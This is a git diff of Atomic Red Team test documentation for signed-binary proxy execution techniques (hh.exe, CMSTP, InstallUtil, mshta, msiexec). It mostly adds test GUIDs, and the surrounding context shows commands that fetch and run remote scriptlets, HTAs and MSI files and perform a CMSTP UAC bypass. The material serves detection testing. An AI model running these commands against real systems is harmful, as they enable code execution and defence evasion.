## Atomic Test #7 - List Internet Explorer Bookmarks using the command prompt -This test will list the bookmarks for Internet Explorer that are found in the Favorites folder +auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 + +This test will list the bookmarks for Internet Explorer that are found in the Favorites folder **Supported Platforms:** Windows diff --git a/atomics/T1218.001/T1218.001.md b/atomics/T1218.001/T1218.001.md index ef702c12..a76fe782 100644 --- a/atomics/T1218.001/T1218.001.md +++ b/atomics/T1218.001/T1218.001.md @@ -24,16 +24,18 @@ A custom CHM file containing embedded payloads could be delivered to a victim th
## Atomic Test #1 - Compiled HTML Help Local Payload + +auto_generated_guid: 5cb87818-0d7c-4469-b7ef-9224107aebe8 + Uses hh.exe to execute a local compiled HTML Help payload. Upon execution calc.exe will open - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | local_chm_file | Local .chm payload | path | PathToAtomicsFolder\T1218.001\src\T1218.001.chm| @@ -52,7 +54,7 @@ hh.exe #{local_chm_file} ##### Description: The payload must exist on disk at specified location (#{local_chm_file}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} +if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -67,16 +69,18 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Compiled HTML Help Remote Payload + +auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d + Uses hh.exe to execute a remote compiled HTML Help payload. Upon execution displays an error saying the file cannot be open - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_chm_file | Remote .chm payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm| @@ -97,15 +101,17 @@ hh.exe #{remote_chm_file}
## Atomic Test #3 - Invoke CHM with default Shortcut Command Execution -Executes a CHM file with the default Shortcut Command method. +auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 + +Executes a CHM file with the default Shortcut Command method. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | chm_file_path | Default path of CHM | string | Test.chm| | hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe| @@ -127,7 +133,7 @@ Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path} ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -141,15 +147,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #4 - Invoke CHM with InfoTech Storage Protocol Handler -Executes a CHM file with the ITS protocol handler. +auto_generated_guid: b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 + +Executes a CHM file with the ITS protocol handler. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe| | infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its| @@ -172,7 +180,7 @@ Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFi ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -186,15 +194,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #5 - Invoke CHM Simulate Double click -Executes a CHM file simulating a user double click. +auto_generated_guid: 5decef42-92b8-4a93-9eb2-877ddcb9401a + +Executes a CHM file simulating a user double click. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | chm_file_path | Default path of CHM | string | Test.chm| @@ -215,7 +225,7 @@ Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path} ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -229,15 +239,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #6 - Invoke CHM with Script Engine and Help Topic -Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension. +auto_generated_guid: 4f83adda-f5ec-406d-b318-9773c9ca92e5 + +Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | topic_extension | Default Help Topic | string | html| | hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe| @@ -262,7 +274,7 @@ Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{ ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -276,15 +288,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #7 - Invoke CHM Shortcut Command with ITS and Help Topic -Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension. +auto_generated_guid: 15756147-7470-4a83-87fb-bb5662526247 + +Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | topic_extension | Default Help Topic | string | html| | hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe| @@ -308,7 +322,7 @@ Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotec ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.002/T1218.002.md b/atomics/T1218.002/T1218.002.md index 8284a94a..831bf542 100644 --- a/atomics/T1218.002/T1218.002.md +++ b/atomics/T1218.002/T1218.002.md @@ -16,16 +16,18 @@ Adversaries may also rename malicious DLL files (.dll) with Control Panel file e
## Atomic Test #1 - Control Panel Items + +auto_generated_guid: 037e9d8a-9e46-4255-8b33-2ae3b545ca6f + This test simulates an adversary leveraging control.exe Upon execution calc.exe will be launched - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | cpl_file_path | path to cpl file | path | PathToAtomicsFolder\T1218.002\bin\calc.cpl| @@ -44,7 +46,7 @@ control.exe #{cpl_file_path} ##### Description: Cpl file must exist on disk at specified location (#{cpl_file_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} +if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.003/T1218.003.md b/atomics/T1218.003/T1218.003.md index 6fcb3da3..4cd4cfd9 100644 --- a/atomics/T1218.003/T1218.003.md +++ b/atomics/T1218.003/T1218.003.md @@ -16,15 +16,17 @@ CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mit
## Atomic Test #1 - CMSTP Executing Remote Scriptlet -Adversaries may supply CMSTP.exe with INF files infected with malicious commands +auto_generated_guid: 34e63321-9683-496b-bbc1-7566bc55e624 + +Adversaries may supply CMSTP.exe with INF files infected with malicious commands **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_file_path | Path to the INF file | path | PathToAtomicsFolder\T1218.003\src\T1218.003.inf| @@ -43,7 +45,7 @@ cmstp.exe /s #{inf_file_path} ##### Description: INF file must exist on disk at specified location (#{inf_file_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} +if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -58,15 +60,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - CMSTP Executing UAC Bypass -Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file +auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 + +Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_file_uac | Path to the INF file | path | PathToAtomicsFolder\T1218.003\src\T1218.003_uacbypass.inf| @@ -85,7 +89,7 @@ cmstp.exe /s #{inf_file_uac} /au ##### Description: INF file must exist on disk at specified location (#{inf_file_uac}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} +if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.004/T1218.004.md b/atomics/T1218.004/T1218.004.md index c7a174a8..d30c0256 100644 --- a/atomics/T1218.004/T1218.004.md +++ b/atomics/T1218.004/T1218.004.md @@ -26,16 +26,18 @@ InstallUtil may also be used to bypass application control through use of attrib
## Atomic Test #1 - CheckIfInstallable method call + +auto_generated_guid: ffd9c807-d402-47d2-879d-f915cf2a3a94 + Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed. If no output is displayed the test executed successfuly. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1| | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\| @@ -87,7 +89,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{test_harness}") {exit 0} else {exit 1} +if (Test-Path "#{test_harness}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -102,16 +104,18 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - InstallHelper method call + +auto_generated_guid: d43a5bde-ae28-4c55-a850-3f4c80573503 + Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test executed successfuly. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1| | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\| @@ -165,7 +169,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{test_harness}") {exit 0} else {exit 1} +if (Test-Path "#{test_harness}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -180,15 +184,17 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - InstallUtil class constructor method call -Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. +auto_generated_guid: 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 + +Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1| | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\| @@ -242,7 +248,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{test_harness}") {exit 0} else {exit 1} +if (Test-Path "#{test_harness}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -257,15 +263,17 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - InstallUtil Install method call -Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. +auto_generated_guid: 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b + +Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1| | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\| @@ -319,7 +327,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{test_harness}") {exit 0} else {exit 1} +if (Test-Path "#{test_harness}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -334,15 +342,17 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - InstallUtil Uninstall method call - /U variant -Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. +auto_generated_guid: 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b + +Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1| | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\| @@ -396,7 +406,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{test_harness}") {exit 0} else {exit 1} +if (Test-Path "#{test_harness}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -411,15 +421,17 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #6 - InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant -Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. +auto_generated_guid: 06d9deba-f732-48a8-af8e-bdd6e4d98c1d + +Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1| | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\| @@ -473,7 +485,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{test_harness}") {exit 0} else {exit 1} +if (Test-Path "#{test_harness}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -488,15 +500,17 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #7 - InstallUtil HelpText method call -Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. +auto_generated_guid: 5a683850-1145-4326-a0e5-e91ced3c6022 + +Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1| | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\| @@ -550,7 +564,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{test_harness}") {exit 0} else {exit 1} +if (Test-Path "#{test_harness}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -565,16 +579,18 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #8 - InstallUtil evasive invocation + +auto_generated_guid: 559e6d06-bb42-4307-bff7-3b95a8254bad + Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation." will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1| @@ -631,7 +647,7 @@ Remove-Item -Path "$Env:windir\System32\Tasks\notepad.exe" -ErrorAction Ignore ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{test_harness}") {exit 0} else {exit 1} +if (Test-Path "#{test_harness}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md index 077398a1..420c1301 100644 --- a/atomics/T1218.005/T1218.005.md +++ b/atomics/T1218.005/T1218.005.md @@ -34,15 +34,17 @@ Mshta.exe can be used to bypass application control solutions that do not accoun
## Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject -Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. +auto_generated_guid: 1483fab9-4f52-4217-a9ce-daa9d7747cae + +Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct| @@ -63,10 +65,12 @@ mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
## Atomic Test #2 - Mshta executes VBScript to execute malicious command + +auto_generated_guid: 906865c3-e05f-4acc-85c4-fbc185455095 + Run a local VB script to run local user enumeration powershell command. This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems. Upon execution, a new PowerShell windows will be opened that displays user information. - **Supported Platforms:** Windows @@ -89,15 +93,17 @@ mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit
## Atomic Test #3 - Mshta Executes Remote HTML Application (HTA) -Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. +auto_generated_guid: c4b97eeb-5249-4455-a607-59f95485cb45 + +Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | temp_file | temp_file location for hta | string | $env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta| | hta_url | URL to HTA file for execution | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta| @@ -125,15 +131,17 @@ remove-item "#{temp_file}" -ErrorAction Ignore
## Atomic Test #4 - Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement -Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement. +auto_generated_guid: 007e5672-2088-4853-a562-7490ddc19447 + +Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_engine | Script Engine to use | string | JScript| | hta_file_path | HTA file name and or path to be used | string | Test.hta| @@ -156,7 +164,7 @@ Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_e ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -170,15 +178,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #5 - Invoke HTML Application - Jscript Engine Simulating Double Click -Executes an HTA Application using JScript script engine simulating double click. +auto_generated_guid: 58a193ec-131b-404e-b1ca-b35cf0b18c33 + +Executes an HTA Application using JScript script engine simulating double click. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_engine | Script Engine to use | string | JScript| | hta_file_path | HTA file name and or path to be used | string | Test.hta| @@ -200,7 +210,7 @@ Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_e ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -214,15 +224,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #6 - Invoke HTML Application - Direct download from URI -Executes an HTA Application by directly downloading from remote URI. +auto_generated_guid: 39ceed55-f653-48ac-bd19-aceceaf525db + +Executes an HTA Application by directly downloading from remote URI. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe| | hta_uri | URI to HTA | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta| @@ -244,7 +256,7 @@ Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path} ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -258,15 +270,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler -Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler. +auto_generated_guid: e7e3a525-7612-4d68-a5d3-c4649181b8af + +Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | rundll32_file_path | Location of rundll32.exe | string | $env:windir\system32\rundll32.exe| | script_engine | Script Engine to use | string | JScript| @@ -289,7 +303,7 @@ Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -303,15 +317,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #8 - Invoke HTML Application - JScript Engine with Inline Protocol Handler -Executes an HTA Application with JScript Engine and Inline Protocol Handler. +auto_generated_guid: d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 + +Executes an HTA Application with JScript Engine and Inline Protocol Handler. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe| | script_engine | Script Engine to use | string | JScript| @@ -334,7 +350,7 @@ Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -348,15 +364,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path -Executes an HTA Application with Simulate lateral movement over UNC Path. +auto_generated_guid: b8a8bdb2-7eae-490d-8251-d5e0295b2362 + +Executes an HTA Application with Simulate lateral movement over UNC Path. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe| @@ -377,7 +395,7 @@ Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_fil ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.007/T1218.007.md b/atomics/T1218.007/T1218.007.md index 44f8b860..e6629801 100644 --- a/atomics/T1218.007/T1218.007.md +++ b/atomics/T1218.007/T1218.007.md @@ -16,15 +16,17 @@ Adversaries may abuse msiexec.exe to launch local or network accessible MSI file
## Atomic Test #1 - Msiexec.exe - Execute Local MSI file -Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. +auto_generated_guid: 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8 + +Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\Win32\T1218.msi| @@ -43,7 +45,7 @@ msiexec.exe /q /i "#{msi_payload}" ##### Description: T1218.msi must exist on disk at specified location (#{msi_payload}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{msi_payload}) {exit 0} else {exit 1} +if (Test-Path #{msi_payload}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -57,15 +59,17 @@ Write-Host "You must provide your own MSI"
## Atomic Test #2 - Msiexec.exe - Execute Remote MSI file -Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. +auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649 + +Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/Win32/T1218.msi| @@ -86,17 +90,19 @@ msiexec.exe /q /i "#{msi_payload}"
